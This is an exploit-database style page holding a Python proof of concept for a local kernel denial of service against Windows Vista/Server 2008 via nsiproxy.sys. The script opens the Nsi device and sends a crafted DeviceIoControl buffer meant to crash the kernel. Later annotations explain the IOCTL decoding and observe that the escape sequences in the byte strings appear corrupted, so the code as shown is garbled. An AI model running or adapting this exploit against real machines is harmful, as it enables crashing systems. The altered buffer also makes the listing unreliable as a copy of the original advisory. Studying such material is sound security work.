
# Title : Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
# Published : 2011-05-18
# Author : Lufeng Li of Neusoft Corporation


#!/usr/bin/python

############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Author: Lufeng Li of Neusoft Corporation
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *

# Handles to the Win32 DLLs used below, loaded through ctypes (Windows only).
kernel32 = windll.kernel32
# Psapi is loaded but never referenced in the listing shown here.
Psapi    = windll.Psapi

# Proof-of-concept described in the header: open the NSI device object and
# send it one fixed DeviceIoControl request. The header reports the effect as
# a local kernel denial of service on Windows Vista / Server 2008.
# The page names no CVE or vendor bulletin, so patch status has to be checked
# against the vendor's own advisories.
if __name__ == '__main__':
    # Win32 access-right and creation-disposition values passed to CreateFileA.
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    # OPEN_EXISTING is defined but unused; the call below passes CREATE_ALWAYS.
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    # Device name handed to CreateFileA; the header attributes the device to
    # nsiproxy.sys.
    # NOTE(review): the string literals in this listing appear to have been
    # altered when the page was extracted, so read it as a record of the
    # advisory rather than a faithful copy of the original file.
    SYM_NAME   = "\\.\Nsi"
    # Receives the byte count written back by DeviceIoControl.
    dwReturn      = c_ulong()
    # Empty output buffer, so the request declares an output length of 0.
    out_buff      = ''
    # Fixed request body used as the IOCTL input buffer; the page gives no
    # structure layout for these values.
    in_buff       = ("x00x00x00x00x00x00x00x00xecx2dx39x6ex07x00x00x00"
                     "x01x00x00x00x00x00x00x00x38x89x6cx01x08x00x00x00"
                     "x00x00x00x00x00x00x00x00x10xfax78x00x28x00x00x00"
                     "x38xfax78x00x0cx00x00x00")

    # The returned handle is not compared with INVALID_HANDLE_VALUE and is
    # never closed; if the open fails, the IOCTL below is still issued.
    handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
    # 0x12003f decodes under the CTL_CODE layout to device type 0x12,
    # function 0xF, FILE_ANY_ACCESS, METHOD_NEITHER. With METHOD_NEITHER the
    # I/O manager hands the caller's buffer pointers to the driver unchanged,
    # so probing and validating them is the driver's responsibility.
    # NOTE(review): the page does not state the root cause; presumably a
    # missing validation on this request path - confirm against the vendor fix.
    # The call's result is stored in dev_ioct but never inspected.
    dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)